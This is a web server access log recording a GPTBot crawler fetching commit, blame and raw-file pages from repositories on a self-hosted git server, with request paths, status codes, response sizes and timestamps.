git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 316199] [Gzip 14.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 317082] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:43:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.diff" +[17/Feb/2026:14:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9893] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" +[17/Feb/2026:14:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49517] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main" +[17/Feb/2026:14:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11234] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:14:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11242] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" +[17/Feb/2026:14:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" [Client 74.7.227.38] [Length 10721] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:14:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17640] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:14:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 18828] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:14:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17364] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:14:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10926] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10908] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10280] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73569] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" +[17/Feb/2026:14:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11111] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" +[17/Feb/2026:14:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:14:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11057] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14298] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr 